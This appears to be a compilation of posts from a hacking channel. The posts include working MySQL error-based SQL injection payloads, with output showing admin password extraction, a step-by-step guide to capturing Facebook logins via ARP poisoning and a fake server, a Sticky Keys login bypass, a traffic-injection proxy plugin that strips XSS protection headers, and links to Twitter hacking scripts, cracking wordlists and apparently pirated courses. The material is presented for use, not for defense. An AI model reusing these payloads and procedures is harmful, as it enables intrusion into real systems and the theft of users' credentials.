▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑mysql injection error utilization method

This tutorial mainly introduces the relevant information summarized by the mysql injection error reporting method. Friends who need it can refer to

1️⃣Report an error through the floor

You can use the following code

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

> Examples are as follows:

First, make a normal query:

mysql> select * from article where id = 1;

+—-+——-+———+

| id | title | content |

+—-+——-+———+

| 1 | test | do it |

+—-+——-+———+

If the id input is injected, you can report an error with the following statement.

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key'group_key'

You can see that the version of Mysql has been successfully released. If you need to query other data, you can query by modifying the statement where version() is located.

For example, we need to query the administrator username and password:

Method1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);

ERROR 1062 (23000): Duplicate entry'admin8881' for key'group_key'

Method2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)* 2)));

ERROR 1062 (23000): Duplicate entry'admin8881' for key'group_key'

2️⃣ExtractValue

The test statement is as follows

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual testing process

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–

ERROR 1105 (HY000): XPATH syntax error:'\admin888'

3️⃣ UpdateXml

Test statement

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual testing process

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error:':root@localhost'

enjoy❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Make A Autorun File For Ur Cd.txt
#fastTips

If you wanna make a autorun file for that CD you are ready to burn just read this...

1) You open notepad

2) now you writ: [autorun]
OPEN=INSTALL\Setup_filename.EXE
ICON=INSTALL\Setup_filename.EXE

Now save it but not as a .txt file but as a .inf file.

But remember! The "Setup_filename.EXE" MUST be replaced with the name of the setup file. And you also need to rember that it is not all of the setup files there are called '.exe but some are called '.msi

3) Now burn your CD with the autorun .inf file included.

4) Now set the CD in you CD drive and wait for the autorun to begin or if nothing happens just double-click on the CD drive in "This Computer"

#fastTips
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Step by step Hacking Facebook Using Man in the Middle Attack:

Attacker IP Address : 192.168.160.148

Victim IP Address : 192.168.160.82

Fake Web Server : 192.168.160.148

I assume you’re in a Local Area Network now.

1) Install the XAMPP and run the APACHE and MySQL service

> http://www.apachefriends.org/en/xampp.html

2) Extract the fb.rar and copy the content to C:\xampp\htdocs

3) Check the fake web server by open it in a web browser and type http://localhost/

4) Install Cain & Abel and do the APR(ARP Poisoning Routing)
http://www.oxid.it/cain.html

5) Choose your interface for sniffing and click OK. When it’s finish, click again the Start/Stop Sniffer to activate the sniffing interface.

6) Go to the Sniffer tab and then click the + (plus sign)

7) Select "All hosts in my subnet" and Click OK.

8) You will see the other people in your network, but my target is 192.168.160.82 (MySelf…LoL :p)

9) After we got all of the information, click at the bottom of application the APR tab.

10) When you finish, now the next step is preparing to redirect the facebook.com page to the fake web server.

Click "APR DNS" and click + to add the new redirecting rule.

11) When everything is finish, just click OK. Then the next step is to activate the APR by clicking the Start/Stop APR button.


12) Now Hacking Facebook using MITM has been activated. This is how it looks like when victim opened http://www.facebook.com

13) But if you ping the domain name, you can reveal that it’s fake, because the address is IP of the attacker

E N J O Y ❤️👍🏻
dark wiki source
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Twitter pentesting 2020 :

> Bypass credibility page ( With the help of user-email.py )

> Save / Tweet the video

> Check valid username

> Check Email

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) git https://github.com/0xfff0800/hack-Twitter

2) cd hack-Twitter

3) chmod +x hack-Twitter.py

4) chmod +x user-email.py

5) python3 hack-Twitter.py

6) python3 user-email.py

> video tutorial
https://youtu.be/InonDo1dPdk

ENJOY❤️👍🏻
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Twitter pentesting 2020 :

> Bypass credibility page ( With the help of user-email.py )

> Save / Tweet the video

> Check valid username

> Check Email

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) git https://github.com/0xfff0800/hack-Twitter

2) cd hack-Twitter

3) chmod +x hack-Twitter.py

4) chmod +x user-email.py

5) python3 hack-Twitter.py

6) python3 user-email.py

> video tutorial
https://youtu.be/InonDo1dPdk

ENJOY❤️👍🏻
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑BEST 2020 FREE RANSOMWARE DECRYPTORS BY AVAST :
— N E V E R P A Y F O R A R A N S O M W A R E —

https://files.avast.com/files/decryptor/avast_decryptor_globe.exe

https://files.avast.com/files/decryptor/avast_decryptor_hiddentear.exe

https://files.avast.com/files/decryptor/avast_decryptor_jigsaw.exe

https://files.avast.com/files/decryptor/avast_decryptor_lambdalocker.exe

https://files.avast.com/files/decryptor/avast_decryptor_legion.exe

https://files.avast.com/files/decryptor/avast_decryptor_noobcrypt.exe

https://files.avast.com/files/decryptor/avast_decryptor_stampado.exe

https://files.avast.com/files/decryptor/avast_decryptor_szflocker.exe

https://files.avast.com/files/decryptor/avast_decryptor_teslacrypt3.exe

https://files.avast.com/files/decryptor/avast_decryptor_troldesh.exe

https://files.avast.com/files/decryptor/avast_decryptor_xdata.exe


ENJOY❤️👍🏻
MORE DETAILS: https://www.avast.com/ransomware-decryption-tools
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Transparent proxies(mitmproxy) that you can use to intercept and manipulate HTTP traffic modifying requests and responses, that allow to inject javascripts into the targets visited. You can easily implement a module to inject data into pages creating a python file in directory "plugins/extension/" automatically will be listed on Pumpkin-Proxy tab.



The Code Plugins Dev

from mitmproxy.models import decoded # for decode content html
from plugins.extension.plugin import PluginTemplate

class Nameplugin(PluginTemplate):
meta = {
'Name' : 'Nameplugin',
'Version' : '1.0',
'Description' : 'Brief description of the new plugin',
'Author' : 'by dev'
}
def __init__(self):
for key,value in self.meta.items():
self.__dict__[key] = value
# if you want set arguments check refer wiki more info.
self.ConfigParser = False # No require arguments

def request(self, flow):
print flow.__dict__
print flow.request.__dict__
print flow.request.headers.__dict__ # request headers
host = flow.request.pretty_host # get domain on the fly requests
versionH = flow.request.http_version # get http version

# get redirect domains example
# pretty_host takes the "Host" header of the request into account,
if flow.request.pretty_host == "example.org":
flow.request.host = "mitmproxy.org"

# get all request Header example
self.send_output.emit("\n[{}][HTTP REQUEST HEADERS]".format(self.Name))
for name, valur in flow.request.headers.iteritems():
self.send_output.emit('{}: {}'.format(name,valur))

print flow.request.method # show method request
# the model printer data
self.send_output.emit('[NamePlugin]:: this is model for save data logging')

def response(self, flow):
print flow.__dict__
print flow.response.__dict__
print flow.response.headers.__dict__ #convert headers for python dict
print flow.response.headers['Content-Type'] # get content type

#every HTTP response before it is returned to the client
with decoded(flow.response):
print flow.response.content # content html
flow.response.content.replace('</body>','<h1>injected</h1></body>') # replace content tag

del flow.response.headers["X-XSS-Protection"] # remove protection Header

flow.response.headers["newheader"] = "foo" # adds a new header
#and the new header will be added to all responses passing through the proxy

(not coded by under code)
E N J O Y ❤️👍🏻
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 new EXPLOITS AND ADVISORIES TUTORIALS :

Http://www.exploit-db.com/

Http://www.cvedetails.com/

Http://www.packetstormsecurity.org/

http://www.securityforest.com/wiki/index.php/Main_Page

Http://www.securityfocus.com/bid

Http://nvd.nist.gov/

Http://osvdb.org/

http://www.nullbyte.org.il/Index.html

Http://secdocs.lonerunners.net/

http://www.phenoelit-us.org/whatSAP/index.html

Http://secunia.com/

Http://cve.mitre.org/

🦑CHEATSHEETS AND SYNTAX

Http://www.cheat-sheets.org/

Http://blog.securitymonks.com/2009/08/15/whats-in-your-folder-security-cheat-sheets/Http://www.exploit-db.com/

Http://www.cvedetails.com/

Http://www.packetstormsecurity.org/

http://www.securityforest.com/wiki/index.php/Main_Page

Http://www.securityfocus.com/bid

Http://nvd.nist.gov/

Http://osvdb.org/

http://www.nullbyte.org.il/Index.html

Http://secdocs.lonerunners.net/

http://www.phenoelit-us.org/whatSAP/index.html

Http://secunia.com/

Http://cve.mitre.org/

E N J O Y ❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑AGILE HACKING/Injections sources :
#resources

Http://www.gnucitizen.org/blog/agile-hacking-a-homegrown-telnet-based-portscanner/

Http://blog.commandlinekungfu.com/

Http://www.securityaegis.com/simple-yet-effective-directory-bruteforcing/

Http://isc.sans.edu/diary.html?storyid=2376

Http://isc.sans.edu/diary.html?storyid=1229

Http://ss64.com/nt/

Http://pauldotcom.com/2010/02/running-a-command-on-every-
mac.html

Http://synjunkie.blogspot.com/2008/03/command-line-ninjitsu.html

Http://www.zonbi.org/2010/06/09/wmic-the-other-other-white-meat/

Http://rstcenter.com/forum/22324-hacking-without-tools-windows.rst

http://www.coresecurity.com/files/attachments/Core_Define_and_Win_Cmd_Line.pdf

http://www.scribd.com/Penetration-Testing-Ninjitsu2-Infrastructure-and-Netcat-without-Netcat/d/3064507

Http://www.pentesterscripting.com/

Http://www.sans.org/reading_room/whitepapers/hackers/windows-script-host-hack-windows_33583

http://www.blackhat.com/presentations/bh-dc-10/Bannedit/BlackHat-DC-2010-Bannedit-Advanced-Command-Injection-Exploitation-1-wp.pdf

E N J O Y ❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑SwiftUI Injection- hack ios apps :

It is possible to inject SwiftUI applications but if you add elements to an interface or use modifiers that change their type, this changes the type of the body properties' Content which causes a crash. To avoid this you need to erase the type.

> The easiest way to do this is add the following extension to your source and use the modifier .eraseToAnyView() at the very end of any declaration of a view's body property you want to iterate over:

 var loadInjection = {
    Bundle(path: "/Applications/InjectionIII.app/Contents/Resources/iOSInjection.bundle")!.load()
}()

extension View {
    #if DEBUG
    func eraseToAnyView() -> AnyView {
        _ = loadInjection
        return AnyView(self)
    }
    #else
    func eraseToAnyView() -> some View {
        return self
    }
    #endif
}

After this, you can put the final touches to your interface interactively on a fully live app.


🦑FULL ALL INJECTIONS REAL CODES :
> https://github.com/johnno1962/InjectionIII


E N J O Y ❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Host script- termux topic - port forwards :

1) apt update

2) apt install git curl php openssh -y

3) git clone git://github.com/htr-tech/host.git

4) cd host

5) Run : bash host.sh

6) choose option via numbers

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑topic wordlists 12gb and more download for cracking :

> https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm

> http://www.insidepro.team/

> https://wiki.skullsecurity.org/Passwords

> https://github.com/danielmiessler/SecLists/tree/master/Passwords

> https://github.com/berzerk0/Probable-Wordlists

> https://github.com/topics/password-cracking

E N J O Y ❤️👍🏻
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Expert white hats (certificated) courses 202 0 :

Another paid packs

1) Linux Essentials Certification

> https://mega.nz/folder/nU1RRJKJ#WXy2dbCZC2zXpBmzLCwgWg

2) Google Cloud Platform Essentials

> https://mega.nz/folder/KV0nVZhD#90whmx3JNeNc_uxC_mrDFg

3) Linux+ and LPIC-1. System Administrator - Exam 101

> https://mega.nz/folder/Pdt1CZrT#rzDxLGouWhGH4BXTNQduKg

4) Learning Python 2.7 Development

> https://mega.nz/folder/DZ83ibIS#VKf_VJFmqfQ-SVbM5yUBww

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Hack into Windows: Reset a local account password using Sticky Keys

> If the System Restore method doesn’t work, there is an alternative that manipulates the Sticky Keys shortcut on the Windows login screen (Sticky Keys lets you use key combinations such as Ctrl+Alt+Delete by pressing one key). This tip only works with local accounts, so skip to the next section if you’re using a Microsoft account.

1) First, restart your computer with the Windows installation media as described above. Click ‘Repair your computer’ | Troubleshoot | Command Prompt. (You can take some of the following commands from this Pastebin page to save you the hassle of typing everything out).

2) In Command Prompt type “copy c:windowssystem32sethc.exe c:” then press Enter (replace c: with another letter if your Windows installation is on a different drive). This step ensures you can reverse the process once you’re back into Windows.

3) Next, type “copy c:windowssystem32cmd.exe c:windowssystem32sethc.exe” and confirm the copy. This replaces the Sticky Keys program with Command Prompt, but keeps its filename and, therefore, the shortcut to it.

4) Restart your computer and, when the Windows login screen appears, tap the Shift key five times in quick succession. You’ll hear a beep, then a Command Prompt window will appear (if not, try repeating the key taps).

5) In this window, type “net user [username] [password]” – replacing [username] with your Windows account username and [password] with your new password

6) Press Enter. If you can’t remember what your username is, type “net user” and press Enter to display all Windows accounts.

7) Close the Command Prompt window and log into Windows using your new password.

8) Now you’re back into Windows, you can revert the Sticky Keys file back to its previous state. Click Start, type cmd and press Enter, then type “copy c:sethc.exe c:windowssystem32sethc.exe” and confirm the copy.

USE FOR LEARN
-POWERED BY WIKI
E N J O Y ❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How To Find Windows 10 Product Key Using CMD, PowerShell, And Windows Registry?

1) To go ahead with this method, you need to boot into your Windows computer. Now, using a simple VBScript–some of you might have seen it on Microsoft forums–you can read all the binary gibberish written in Windows Registry. This script translates the Registry values into a readable format.

2) So, just copy and paste the following script in a Notepad window and save its as productkey.vbs by choosing the “All Files” option in “Save as type.”

Set WshShell = CreateObject("WScript.Shell")
MsgBox ConvertToKey(WshShell.RegRead("HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DigitalProductId"))

Function ConvertToKey(Key)
Const KeyOffset = 52
i = 28
Chars = "BCDFGHJKMPQRTVWXY2346789"
Do
Cur = 0
x = 14
Do
Cur = Cur * 256
Cur = Key(x + KeyOffset) + Cur
Key(x + KeyOffset) = (Cur \ 24) And 255
Cur = Cur Mod 24
x = x -1
Loop While x >= 0
i = i -1
KeyOutput = Mid(Chars, Cur + 1, 1) & KeyOutput
If (((29 - i) Mod 6) = 0) And (i <> -1) Then
i = i -1
KeyOutput = "-" & KeyOutput
End If
Loop While i >= 0
ConvertToKey = KeyOutput
End Function

3) After saving this file, just click on it and a new popup window will show your Windows product key in the registry. You can copy or note this down somewhere to use it later.


enjoy❤️👍🏻
@UndercodeTesting
(code by wiki)✅
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁